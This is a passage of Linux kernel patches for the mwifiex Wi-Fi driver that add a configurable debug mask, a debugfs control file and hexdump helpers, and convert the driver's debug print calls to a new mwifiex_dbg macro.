b/drivers/net/wireless/mwifiex/debugfs.c index 414ee2da9bfc..f3e19e917949 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -535,6 +535,67 @@ mwifiex_regrdwr_read(struct file *file, char __user *ubuf, return ret; } +/* Proc debug_mask file read handler. + * This function is called when the 'debug_mask' file is opened for reading + * This function can be used read driver debugging mask value. 
+ */ +static ssize_t +mwifiex_debug_mask_read(struct file *file, char __user *ubuf, + size_t count, loff_t *ppos) +{ + struct mwifiex_private *priv = + (struct mwifiex_private *)file->private_data; + unsigned long page = get_zeroed_page(GFP_KERNEL); + char *buf = (char *)page; + size_t ret = 0; + int pos = 0; + + if (!buf) + return -ENOMEM; + + pos += snprintf(buf, PAGE_SIZE, "debug mask=0x%08x\n", + priv->adapter->debug_mask); + ret = simple_read_from_buffer(ubuf, count, ppos, buf, pos); + + free_page(page); + return ret; +} + +/* Proc debug_mask file read handler. + * This function is called when the 'debug_mask' file is opened for reading + * This function can be used read driver debugging mask value. + */ +static ssize_t +mwifiex_debug_mask_write(struct file *file, const char __user *ubuf, + size_t count, loff_t *ppos) +{ + int ret; + unsigned long debug_mask; + struct mwifiex_private *priv = (void *)file->private_data; + unsigned long addr = get_zeroed_page(GFP_KERNEL); + char *buf = (void *)addr; + size_t buf_size = min(count, (size_t)(PAGE_SIZE - 1)); + + if (!buf) + return -ENOMEM; + + if (copy_from_user(buf, ubuf, buf_size)) { + ret = -EFAULT; + goto done; + } + + if (kstrtoul(buf, 0, &debug_mask)) { + ret = -EINVAL; + goto done; + } + + priv->adapter->debug_mask = debug_mask; + ret = count; +done: + free_page(addr); + return ret; +} + /* Proc memrw file write handler. * This function is called when the 'memrw' file is opened for writing * This function can be used to write to a memory location. @@ -829,6 +890,7 @@ MWIFIEX_DFS_FILE_OPS(rdeeprom); MWIFIEX_DFS_FILE_OPS(memrw); MWIFIEX_DFS_FILE_OPS(hscfg); MWIFIEX_DFS_FILE_OPS(histogram); +MWIFIEX_DFS_FILE_OPS(debug_mask); /* * This function creates the debug FS directory structure and the files. @@ -854,6 +916,7 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv) MWIFIEX_DFS_ADD_FILE(memrw); MWIFIEX_DFS_ADD_FILE(hscfg); MWIFIEX_DFS_ADD_FILE(histogram); + MWIFIEX_DFS_ADD_FILE(debug_mask); } /* diff --git a/drivers/net/wireless/mwifiex/ioctl.h b/drivers/net/wireless/mwifiex/ioctl.h index 224c993e62e9..6f11a25a6b49 100644 --- a/drivers/net/wireless/mwifiex/ioctl.h +++ b/drivers/net/wireless/mwifiex/ioctl.h @@ -189,6 +189,7 @@ struct tdls_peer_info { }; struct mwifiex_debug_info { + unsigned int debug_mask; u32 int_counter; u32 packets_out[MAX_NUM_TID]; u32 tx_buf_size; diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index 213aa986e87a..eca4378eddda 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -24,6 +24,10 @@ #define VERSION "1.0" +static unsigned int debug_mask = MWIFIEX_DEFAULT_DEBUG_MASK; +module_param(debug_mask, uint, 0); +MODULE_PARM_DESC(debug_mask, "bitmap for debug flags"); + const char driver_version[] = "mwifiex " VERSION " (%s) "; static char *cal_data_cfg; module_param(cal_data_cfg, charp, 0); @@ -63,6 +67,7 @@ static int mwifiex_register(void *card, struct mwifiex_if_ops *if_ops, /* Save interface specific operations in adapter */ memmove(&adapter->if_ops, if_ops, sizeof(struct mwifiex_if_ops)); + adapter->debug_mask = debug_mask; /* card specific initialization has been deferred until now .. 
*/ if (adapter->if_ops.init_if) diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index b387d5a9f1e6..6cbbc50126ac 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -147,6 +147,45 @@ enum { /* Address alignment */ #define MWIFIEX_ALIGN_ADDR(p, a) (((long)(p) + (a) - 1) & ~((a) - 1)) +/** + *enum mwifiex_debug_level - marvell wifi debug level + */ +enum MWIFIEX_DEBUG_LEVEL { + MWIFIEX_DBG_MSG = 0x00000001, + MWIFIEX_DBG_FATAL = 0x00000002, + MWIFIEX_DBG_ERROR = 0x00000004, + MWIFIEX_DBG_DATA = 0x00000008, + MWIFIEX_DBG_CMD = 0x00000010, + MWIFIEX_DBG_EVENT = 0x00000020, + MWIFIEX_DBG_INTR = 0x00000040, + MWIFIEX_DBG_IOCTL = 0x00000080, + + MWIFIEX_DBG_MPA_D = 0x00008000, + MWIFIEX_DBG_DAT_D = 0x00010000, + MWIFIEX_DBG_CMD_D = 0x00020000, + MWIFIEX_DBG_EVT_D = 0x00040000, + MWIFIEX_DBG_FW_D = 0x00080000, + MWIFIEX_DBG_IF_D = 0x00100000, + + MWIFIEX_DBG_ENTRY = 0x10000000, + MWIFIEX_DBG_WARN = 0x20000000, + MWIFIEX_DBG_INFO = 0x40000000, + MWIFIEX_DBG_DUMP = 0x80000000, + + MWIFIEX_DBG_ANY = 0xffffffff +}; + +#define MWIFIEX_DEFAULT_DEBUG_MASK (MWIFIEX_DBG_MSG | \ + MWIFIEX_DBG_FATAL | \ + MWIFIEX_DBG_ERROR) + +#define mwifiex_dbg(adapter, dbg_mask, fmt, args...) \ +do { \ + if ((adapter)->debug_mask & MWIFIEX_DBG_##dbg_mask) \ + if ((adapter)->dev) \ + dev_info((adapter)->dev, fmt, ## args); \ +} while (0) + struct mwifiex_dbg { u32 num_cmd_host_to_card_failure; u32 num_cmd_sleep_cfm_host_to_card_failure; @@ -751,6 +790,7 @@ struct mwifiex_if_ops { struct mwifiex_adapter { u8 iface_type; + unsigned int debug_mask; struct mwifiex_iface_comb iface_limit; struct mwifiex_iface_comb curr_iface_comb; struct mwifiex_private *priv[MWIFIEX_MAX_BSS_NUM]; diff --git a/drivers/net/wireless/mwifiex/util.c b/drivers/net/wireless/mwifiex/util.c index 9482d955c384..22d93af83cfe 100644 --- a/drivers/net/wireless/mwifiex/util.c +++ b/drivers/net/wireless/mwifiex/util.c @@ -26,6 +26,8 @@ #include "11n.h" static struct mwifiex_debug_data items[] = { + {"debug_mask", item_size(debug_mask), + item_addr(debug_mask), 1}, {"int_counter", item_size(int_counter), item_addr(int_counter), 1}, {"wmm_ac_vo", item_size(packets_out[WMM_AC_VO]), @@ -178,6 +180,7 @@ int mwifiex_get_debug_info(struct mwifiex_private *priv, struct mwifiex_adapter *adapter = priv->adapter; if (info) { + info->debug_mask = adapter->debug_mask; memcpy(info->packets_out, priv->wmm.packets_out, sizeof(priv->wmm.packets_out)); From 868093a9df7580d6d50639d58f2c6e334dd73622 Mon Sep 17 00:00:00 2001 From: Zhaoyang Liu Date: Tue, 12 May 2015 00:48:19 +0530 Subject: [PATCH 204/872] mwifiex: add dump data debug support This patch is to add support for data hexdump debug feature. It is controlled by level debug_mask in adapter structure. 
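The dump itself goes through the new mwifiex_dbg_dump() helper, which only calls
print_hex_dump() when the matching MWIFIEX_DBG_*_D bit is set in
adapter->debug_mask, and data-path dumps are truncated to
DEBUG_DUMP_DATA_MAX_LEN bytes. A representative call site from the receive path
below (shown here only as an illustration of the gating pattern):

    /* hexdump of a received frame; a no-op unless MWIFIEX_DBG_DAT_D
     * is set in adapter->debug_mask
     */
    mwifiex_dbg_dump(adapter, DAT_D, "rx pkt:", skb->data,
                     min_t(size_t, skb->len, DEBUG_DUMP_DATA_MAX_LEN));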
Signed-off-by: Zhaoyang Liu Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/cmdevt.c | 11 +++++++++-- drivers/net/wireless/mwifiex/main.h | 9 +++++++++ drivers/net/wireless/mwifiex/pcie.c | 2 +- drivers/net/wireless/mwifiex/scan.c | 3 +++ drivers/net/wireless/mwifiex/txrx.c | 5 +++++ 5 files changed, 27 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/mwifiex/cmdevt.c b/drivers/net/wireless/mwifiex/cmdevt.c index c5a14ff7eb82..5b197860b584 100644 --- a/drivers/net/wireless/mwifiex/cmdevt.c +++ b/drivers/net/wireless/mwifiex/cmdevt.c @@ -201,6 +201,7 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", cmd_code, le16_to_cpu(*(__le16 *) ((u8 *) host_cmd + S_DS_GEN)), cmd_size, le16_to_cpu(host_cmd->seq_num)); + mwifiex_dbg_dump(adapter, CMD_D, "cmd buffer:", host_cmd, cmd_size); if (adapter->iface_type == MWIFIEX_USB) { tmp = cpu_to_le32(MWIFIEX_USB_TYPE_CMD); @@ -286,6 +287,8 @@ static int mwifiex_dnld_sleep_confirm_cmd(struct mwifiex_adapter *adapter) le16_to_cpu(sleep_cfm_buf->action), le16_to_cpu(sleep_cfm_buf->size), le16_to_cpu(sleep_cfm_buf->seq_num)); + mwifiex_dbg_dump(adapter, CMD_D, "SLEEP_CFM buffer: ", sleep_cfm_buf, + le16_to_cpu(sleep_cfm_buf->size)); if (adapter->iface_type == MWIFIEX_USB) { sleep_cfm_tmp = @@ -362,8 +365,9 @@ int mwifiex_alloc_cmd_buffer(struct mwifiex_adapter *adapter) for (i = 0; i < MWIFIEX_NUM_OF_CMD_BUFFER; i++) { cmd_array[i].skb = dev_alloc_skb(MWIFIEX_SIZE_OF_CMD_BUFFER); if (!cmd_array[i].skb) { - dev_err(adapter->dev, "ALLOC_CMD_BUF: out of memory\n"); - return -1; + dev_err(adapter->dev, + "unable to allocate command buffer\n"); + return -ENOMEM; } } @@ -460,6 +464,7 @@ int mwifiex_process_event(struct mwifiex_adapter *adapter) } dev_dbg(adapter->dev, "EVENT: cause: %#x\n", eventcause); + mwifiex_dbg_dump(adapter, EVT_D, "Event Buf:", skb->data, skb->len); if (priv->bss_role == MWIFIEX_BSS_ROLE_UAP) ret = mwifiex_process_uap_event(priv); @@ -826,6 +831,8 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", orig_cmdresp_no, cmdresp_result, le16_to_cpu(resp->size), le16_to_cpu(resp->seq_num)); + mwifiex_dbg_dump(adapter, CMD_D, "CMD_RESP buffer:", resp, + le16_to_cpu(resp->size)); if (!(orig_cmdresp_no & HostCmd_RET_BIT)) { dev_err(adapter->dev, "CMD_RESP: invalid cmd resp\n"); diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index 6cbbc50126ac..2f5516194e32 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -186,6 +186,15 @@ do { \ dev_info((adapter)->dev, fmt, ## args); \ } while (0) +#define DEBUG_DUMP_DATA_MAX_LEN 128 +#define mwifiex_dbg_dump(adapter, dbg_mask, str, buf, len) \ +do { \ + if ((adapter)->debug_mask & MWIFIEX_DBG_##dbg_mask) \ + print_hex_dump(KERN_DEBUG, str, \ + DUMP_PREFIX_OFFSET, 16, 1, \ + buf, len, false); \ +} while (0) + struct mwifiex_dbg { u32 num_cmd_host_to_card_failure; u32 num_cmd_sleep_cfm_host_to_card_failure; diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index bcc7751d883c..88bda3f68164 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -1721,7 +1721,7 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) len is 2 bytes followed by type which is 2 bytes */ memcpy(&data_len, skb_cmd->data, sizeof(__le16)); evt_len = 
le16_to_cpu(data_len); - + skb_trim(skb_cmd, evt_len); skb_pull(skb_cmd, INTF_HEADER_LEN); dev_dbg(adapter->dev, "info: Event length: %d\n", evt_len); diff --git a/drivers/net/wireless/mwifiex/scan.c b/drivers/net/wireless/mwifiex/scan.c index 0ffdb7c5afd2..84843d1b0a04 100644 --- a/drivers/net/wireless/mwifiex/scan.c +++ b/drivers/net/wireless/mwifiex/scan.c @@ -2125,6 +2125,9 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, dev_dbg(adapter->dev, "EXT_SCAN: size %d, returned %d APs...", scan_resp_size, num_of_set); + mwifiex_dbg_dump(adapter, CMD_D, "EXT_SCAN buffer:", buf, + scan_resp_size + + sizeof(struct mwifiex_event_scan_result)); tlv = (struct mwifiex_ie_types_data *)scan_resp; diff --git a/drivers/net/wireless/mwifiex/txrx.c b/drivers/net/wireless/mwifiex/txrx.c index a245f444aeec..73082b51f6e1 100644 --- a/drivers/net/wireless/mwifiex/txrx.c +++ b/drivers/net/wireless/mwifiex/txrx.c @@ -55,6 +55,9 @@ int mwifiex_handle_rx_packet(struct mwifiex_adapter *adapter, return -1; } + mwifiex_dbg_dump(adapter, DAT_D, "rx pkt:", skb->data, + min_t(size_t, skb->len, DEBUG_DUMP_DATA_MAX_LEN)); + memset(rx_info, 0, sizeof(*rx_info)); rx_info->bss_num = priv->bss_num; rx_info->bss_type = priv->bss_type; @@ -112,6 +115,8 @@ int mwifiex_process_tx(struct mwifiex_private *priv, struct sk_buff *skb, skb, tx_param); } } + mwifiex_dbg_dump(adapter, DAT_D, "tx pkt:", skb->data, + min_t(size_t, skb->len, DEBUG_DUMP_DATA_MAX_LEN)); switch (ret) { case -ENOSR: From acebe8c10a6eabdb9c34370a774b5b3fcbae3ff4 Mon Sep 17 00:00:00 2001 From: Zhaoyang Liu Date: Tue, 12 May 2015 00:48:20 +0530 Subject: [PATCH 205/872] mwifiex: change dbg print func to mwifiex_dbg This patch changes all debug print functions from dev_dbg/dev_err/dev_info to mwifiex specific debug functions. 
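The conversion is mechanical: each dev_*/wiphy_* call becomes an mwifiex_dbg()
call with an explicit level (dev_err/wiphy_err -> ERROR, dev_notice -> MSG,
dev_dbg -> MSG/INFO/CMD/EVENT/DATA depending on context), so the message is only
emitted when that bit is set in adapter->debug_mask. A representative pair taken
from the 11n code below, shown as plain C for clarity:

    /* before */
    dev_dbg(priv->adapter->dev, "info: BA stream complete\n");
    dev_err(priv->adapter->dev, "BA stream not created\n");

    /* after: routed through the adapter and gated on debug_mask bits */
    mwifiex_dbg(priv->adapter, EVENT, "info: BA stream complete\n");
    mwifiex_dbg(priv->adapter, ERROR, "BA stream not created\n");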
Signed-off-by: Zhaoyang Liu Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/11h.c | 48 +- drivers/net/wireless/mwifiex/11n.c | 24 +- drivers/net/wireless/mwifiex/11n_aggr.c | 7 +- drivers/net/wireless/mwifiex/11n_rxreorder.c | 51 +- drivers/net/wireless/mwifiex/cfg80211.c | 462 +++++++++------- drivers/net/wireless/mwifiex/cfp.c | 50 +- drivers/net/wireless/mwifiex/cmdevt.c | 354 +++++++----- drivers/net/wireless/mwifiex/debugfs.c | 3 +- drivers/net/wireless/mwifiex/ethtool.c | 6 +- drivers/net/wireless/mwifiex/init.c | 53 +- drivers/net/wireless/mwifiex/join.c | 208 +++---- drivers/net/wireless/mwifiex/main.c | 109 ++-- drivers/net/wireless/mwifiex/pcie.c | 550 ++++++++++--------- drivers/net/wireless/mwifiex/scan.c | 374 +++++++------ drivers/net/wireless/mwifiex/sdio.c | 424 ++++++++------ drivers/net/wireless/mwifiex/sta_cmd.c | 136 ++--- drivers/net/wireless/mwifiex/sta_cmdresp.c | 181 +++--- drivers/net/wireless/mwifiex/sta_event.c | 130 ++--- drivers/net/wireless/mwifiex/sta_ioctl.c | 145 ++--- drivers/net/wireless/mwifiex/sta_rx.c | 13 +- drivers/net/wireless/mwifiex/sta_tx.c | 18 +- drivers/net/wireless/mwifiex/tdls.c | 86 +-- drivers/net/wireless/mwifiex/txrx.c | 25 +- drivers/net/wireless/mwifiex/uap_cmd.c | 20 +- drivers/net/wireless/mwifiex/uap_event.c | 44 +- drivers/net/wireless/mwifiex/uap_txrx.c | 36 +- drivers/net/wireless/mwifiex/usb.c | 141 +++-- drivers/net/wireless/mwifiex/util.c | 24 +- drivers/net/wireless/mwifiex/wmm.c | 98 ++-- 29 files changed, 2122 insertions(+), 1698 deletions(-) diff --git a/drivers/net/wireless/mwifiex/11h.c b/drivers/net/wireless/mwifiex/11h.c index 3ab87a855122..65cd461c88db 100644 --- a/drivers/net/wireless/mwifiex/11h.c +++ b/drivers/net/wireless/mwifiex/11h.c @@ -134,8 +134,8 @@ void mwifiex_dfs_cac_work_queue(struct work_struct *work) chandef = priv->dfs_chandef; if (priv->wdev.cac_started) { - dev_dbg(priv->adapter->dev, - "CAC timer finished; No radar detected\n"); + mwifiex_dbg(priv->adapter, MSG, + "CAC timer finished; No radar detected\n"); cfg80211_cac_event(priv->netdev, &chandef, NL80211_RADAR_CAC_FINISHED, GFP_KERNEL); @@ -161,9 +161,9 @@ int mwifiex_cmd_issue_chan_report_request(struct mwifiex_private *priv, cr_req->chan_desc.chan_width = radar_params->chandef->width; cr_req->msec_dwell_time = cpu_to_le32(radar_params->cac_time_ms); - dev_dbg(priv->adapter->dev, - "11h: issuing DFS Radar check for channel=%d\n", - radar_params->chandef->chan->hw_value); + mwifiex_dbg(priv->adapter, MSG, + "11h: issuing DFS Radar check for channel=%d\n", + radar_params->chandef->chan->hw_value); return 0; } @@ -174,8 +174,8 @@ int mwifiex_cmd_issue_chan_report_request(struct mwifiex_private *priv, void mwifiex_abort_cac(struct mwifiex_private *priv) { if (priv->wdev.cac_started) { - dev_dbg(priv->adapter->dev, - "Aborting delayed work for CAC.\n"); + mwifiex_dbg(priv->adapter, MSG, + "Aborting delayed work for CAC.\n"); cancel_delayed_work_sync(&priv->dfs_cac_work); cfg80211_cac_event(priv->netdev, &priv->dfs_chandef, NL80211_RADAR_CAC_ABORTED, GFP_KERNEL); @@ -199,7 +199,8 @@ int mwifiex_11h_handle_chanrpt_ready(struct mwifiex_private *priv, sizeof(u32)); if (le32_to_cpu(rpt_event->result) != HostCmd_RESULT_OK) { - dev_err(priv->adapter->dev, "Error in channel report event\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Error in channel report event\n"); return -1; } @@ -212,8 +213,8 @@ int mwifiex_11h_handle_chanrpt_ready(struct mwifiex_private *priv, switch 
(le16_to_cpu(rpt->header.type)) { case TLV_TYPE_CHANRPT_11H_BASIC: if (rpt->map.radar) { - dev_notice(priv->adapter->dev, - "RADAR Detected on channel %d!\n", + mwifiex_dbg(priv->adapter, MSG, + "RADAR Detected on channel %d!\n", priv->dfs_chandef.chan->hw_value); cancel_delayed_work_sync(&priv->dfs_cac_work); cfg80211_cac_event(priv->netdev, @@ -242,16 +243,17 @@ int mwifiex_11h_handle_radar_detected(struct mwifiex_private *priv, rdr_event = (void *)(skb->data + sizeof(u32)); if (le32_to_cpu(rdr_event->passed)) { - dev_notice(priv->adapter->dev, - "radar detected; indicating kernel\n"); + mwifiex_dbg(priv->adapter, MSG, + "radar detected; indicating kernel\n"); cfg80211_radar_event(priv->adapter->wiphy, &priv->dfs_chandef, GFP_KERNEL); - dev_dbg(priv->adapter->dev, "regdomain: %d\n", - rdr_event->reg_domain); - dev_dbg(priv->adapter->dev, "radar detection type: %d\n", - rdr_event->det_type); + mwifiex_dbg(priv->adapter, MSG, "regdomain: %d\n", + rdr_event->reg_domain); + mwifiex_dbg(priv->adapter, MSG, "radar detection type: %d\n", + rdr_event->det_type); } else { - dev_dbg(priv->adapter->dev, "false radar detection event!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "false radar detection event!\n"); } return 0; @@ -276,20 +278,20 @@ void mwifiex_dfs_chan_sw_work_queue(struct work_struct *work) bss_cfg = &priv->bss_cfg; if (!bss_cfg->beacon_period) { - dev_err(priv->adapter->dev, - "channel switch: AP already stopped\n"); + mwifiex_dbg(priv->adapter, ERROR, + "channel switch: AP already stopped\n"); return; } mwifiex_uap_set_channel(bss_cfg, priv->dfs_chandef); if (mwifiex_config_start_uap(priv, bss_cfg)) { - dev_dbg(priv->adapter->dev, - "Failed to start AP after channel switch\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to start AP after channel switch\n"); return; } - dev_notice(priv->adapter->dev, - "indicating channel switch completion to kernel\n"); + mwifiex_dbg(priv->adapter, MSG, + "indicating channel switch completion to kernel\n"); cfg80211_ch_switch_notify(priv->netdev, &priv->dfs_chandef); } diff --git a/drivers/net/wireless/mwifiex/11n.c b/drivers/net/wireless/mwifiex/11n.c index 433bd6837c79..8422986cd7a9 100644 --- a/drivers/net/wireless/mwifiex/11n.c +++ b/drivers/net/wireless/mwifiex/11n.c @@ -42,7 +42,7 @@ int mwifiex_fill_cap_info(struct mwifiex_private *priv, u8 radio_type, priv->wdev.wiphy->bands[radio_type]; if (WARN_ON_ONCE(!sband)) { - dev_err(priv->adapter->dev, "Invalid radio type!\n"); + mwifiex_dbg(priv->adapter, ERROR, "Invalid radio type!\n"); return -EINVAL; } @@ -184,7 +184,7 @@ int mwifiex_ret_11n_addba_req(struct mwifiex_private *priv, tx_ba_tbl = mwifiex_get_ba_tbl(priv, tid, add_ba_rsp->peer_mac_addr); if (tx_ba_tbl) { - dev_dbg(priv->adapter->dev, "info: BA stream complete\n"); + mwifiex_dbg(priv->adapter, EVENT, "info: BA stream complete\n"); tx_ba_tbl->ba_status = BA_SETUP_COMPLETE; if ((block_ack_param_set & BLOCKACKPARAM_AMSDU_SUPP_MASK) && priv->add_ba_param.tx_amsdu && @@ -197,7 +197,7 @@ int mwifiex_ret_11n_addba_req(struct mwifiex_private *priv, ra_list->ba_status = BA_SETUP_COMPLETE; } } else { - dev_err(priv->adapter->dev, "BA stream not created\n"); + mwifiex_dbg(priv->adapter, ERROR, "BA stream not created\n"); } return 0; @@ -224,7 +224,8 @@ int mwifiex_cmd_recfg_tx_buf(struct mwifiex_private *priv, tx_buf->action = cpu_to_le16(action); switch (action) { case HostCmd_ACT_GEN_SET: - dev_dbg(priv->adapter->dev, "cmd: set tx_buf=%d\n", *buf_size); + mwifiex_dbg(priv->adapter, CMD, + "cmd: set tx_buf=%d\n", *buf_size); tx_buf->buff_size 
= cpu_to_le16(*buf_size); break; case HostCmd_ACT_GEN_GET: @@ -466,7 +467,8 @@ void mwifiex_11n_delete_tx_ba_stream_tbl_entry(struct mwifiex_private *priv, mwifiex_is_tx_ba_stream_ptr_valid(priv, tx_ba_tsr_tbl)) return; - dev_dbg(priv->adapter->dev, "info: tx_ba_tsr_tbl %p\n", tx_ba_tsr_tbl); + mwifiex_dbg(priv->adapter, INFO, + "info: tx_ba_tsr_tbl %p\n", tx_ba_tsr_tbl); list_del(&tx_ba_tsr_tbl->list); @@ -563,7 +565,7 @@ int mwifiex_send_addba(struct mwifiex_private *priv, int tid, u8 *peer_mac) unsigned long flags; u16 block_ack_param_set; - dev_dbg(priv->adapter->dev, "cmd: %s: tid %d\n", __func__, tid); + mwifiex_dbg(priv->adapter, CMD, "cmd: %s: tid %d\n", __func__, tid); if ((GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA) && ISSUPP_TDLS_ENABLED(priv->adapter->fw_cap_info) && @@ -575,9 +577,9 @@ int mwifiex_send_addba(struct mwifiex_private *priv, int tid, u8 *peer_mac) sta_ptr = mwifiex_get_sta_entry(priv, peer_mac); if (!sta_ptr) { spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); - dev_warn(priv->adapter->dev, - "BA setup with unknown TDLS peer %pM!\n", - peer_mac); + mwifiex_dbg(priv->adapter, ERROR, + "BA setup with unknown TDLS peer %pM!\n", + peer_mac); return -1; } if (sta_ptr->is_11ac_enabled) @@ -706,8 +708,8 @@ int mwifiex_get_tx_ba_stream_tbl(struct mwifiex_private *priv, spin_lock_irqsave(&priv->tx_ba_stream_tbl_lock, flags); list_for_each_entry(tx_ba_tsr_tbl, &priv->tx_ba_stream_tbl_ptr, list) { rx_reo_tbl->tid = (u16) tx_ba_tsr_tbl->tid; - dev_dbg(priv->adapter->dev, "data: %s tid=%d\n", - __func__, rx_reo_tbl->tid); + mwifiex_dbg(priv->adapter, DATA, "data: %s tid=%d\n", + __func__, rx_reo_tbl->tid); memcpy(rx_reo_tbl->ra, tx_ba_tsr_tbl->ra, ETH_ALEN); rx_reo_tbl->amsdu = tx_ba_tsr_tbl->amsdu; rx_reo_tbl++; diff --git a/drivers/net/wireless/mwifiex/11n_aggr.c b/drivers/net/wireless/mwifiex/11n_aggr.c index 6183e255e62a..f7c717253a66 100644 --- a/drivers/net/wireless/mwifiex/11n_aggr.c +++ b/drivers/net/wireless/mwifiex/11n_aggr.c @@ -187,7 +187,6 @@ mwifiex_11n_aggregate_pkt(struct mwifiex_private *priv, skb_aggr = mwifiex_alloc_dma_align_buf(adapter->tx_buf_size, GFP_ATOMIC | GFP_DMA); if (!skb_aggr) { - dev_err(adapter->dev, "%s: alloc skb_aggr\n", __func__); spin_unlock_irqrestore(&priv->wmm.ra_list_spinlock, ra_list_flags); return -1; @@ -297,13 +296,13 @@ mwifiex_11n_aggregate_pkt(struct mwifiex_private *priv, tx_info_aggr->flags |= MWIFIEX_BUF_FLAG_REQUEUED_PKT; spin_unlock_irqrestore(&priv->wmm.ra_list_spinlock, ra_list_flags); - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); break; case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "%s: host_to_card failed: %#x\n", - __func__, ret); + mwifiex_dbg(adapter, ERROR, "%s: host_to_card failed: %#x\n", + __func__, ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb_aggr, 1, ret); return 0; diff --git a/drivers/net/wireless/mwifiex/11n_rxreorder.c b/drivers/net/wireless/mwifiex/11n_rxreorder.c index f75f8acfaca0..39d7a957674c 100644 --- a/drivers/net/wireless/mwifiex/11n_rxreorder.c +++ b/drivers/net/wireless/mwifiex/11n_rxreorder.c @@ -51,8 +51,8 @@ static int mwifiex_11n_dispatch_amsdu_pkt(struct mwifiex_private *priv, rx_skb = __skb_dequeue(&list); ret = mwifiex_recv_packet(priv, rx_skb); if (ret == -1) - dev_err(priv->adapter->dev, - "Rx of A-MSDU failed"); + mwifiex_dbg(priv->adapter, ERROR, + "Rx of A-MSDU failed"); } return 0; } @@ -304,7 +304,7 @@ 
mwifiex_flush_data(unsigned long context) if (seq_num < 0) return; - dev_dbg(ctx->priv->adapter->dev, "info: flush data %d\n", seq_num); + mwifiex_dbg(ctx->priv->adapter, INFO, "info: flush data %d\n", seq_num); start_win = (ctx->ptr->start_win + seq_num + 1) & (MAX_TID_VALUE - 1); mwifiex_11n_dispatch_pkt_until_start_win(ctx->priv, ctx->ptr, start_win); @@ -367,8 +367,9 @@ mwifiex_11n_create_rx_reorder_tbl(struct mwifiex_private *priv, u8 *ta, } spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); - dev_dbg(priv->adapter->dev, "info: last_seq=%d start_win=%d\n", - last_seq, new_node->start_win); + mwifiex_dbg(priv->adapter, INFO, + "info: last_seq=%d start_win=%d\n", + last_seq, new_node->start_win); if (last_seq != MWIFIEX_DEF_11N_RX_SEQ_NUM && last_seq >= new_node->start_win) { @@ -382,8 +383,8 @@ mwifiex_11n_create_rx_reorder_tbl(struct mwifiex_private *priv, u8 *ta, GFP_KERNEL); if (!new_node->rx_reorder_ptr) { kfree((u8 *) new_node); - dev_err(priv->adapter->dev, - "%s: failed to alloc reorder_ptr\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: failed to alloc reorder_ptr\n", __func__); return; } @@ -467,9 +468,9 @@ int mwifiex_cmd_11n_addba_rsp_gen(struct mwifiex_private *priv, cmd_addba_req->peer_mac_addr); if (!sta_ptr) { spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); - dev_warn(priv->adapter->dev, - "BA setup with unknown TDLS peer %pM!\n", - cmd_addba_req->peer_mac_addr); + mwifiex_dbg(priv->adapter, ERROR, + "BA setup with unknown TDLS peer %pM!\n", + cmd_addba_req->peer_mac_addr); return -1; } if (sta_ptr->is_11ac_enabled) @@ -573,14 +574,14 @@ int mwifiex_11n_rx_reorder_pkt(struct mwifiex_private *priv, } if (tbl->flags & RXREOR_FORCE_NO_DROP) { - dev_dbg(priv->adapter->dev, - "RXREOR_FORCE_NO_DROP when HS is activated\n"); + mwifiex_dbg(priv->adapter, INFO, + "RXREOR_FORCE_NO_DROP when HS is activated\n"); tbl->flags &= ~RXREOR_FORCE_NO_DROP; } else if (init_window_shift && seq_num < start_win && seq_num >= tbl->init_win) { - dev_dbg(priv->adapter->dev, - "Sender TID sequence number reset %d->%d for SSN %d\n", - start_win, seq_num, tbl->init_win); + mwifiex_dbg(priv->adapter, INFO, + "Sender TID sequence number reset %d->%d for SSN %d\n", + start_win, seq_num, tbl->init_win); tbl->start_win = start_win = seq_num; end_win = ((start_win + win_size) - 1) & (MAX_TID_VALUE - 1); } else { @@ -668,23 +669,23 @@ mwifiex_del_ba_tbl(struct mwifiex_private *priv, int tid, u8 *peer_mac, else cleanup_rx_reorder_tbl = (initiator) ? 
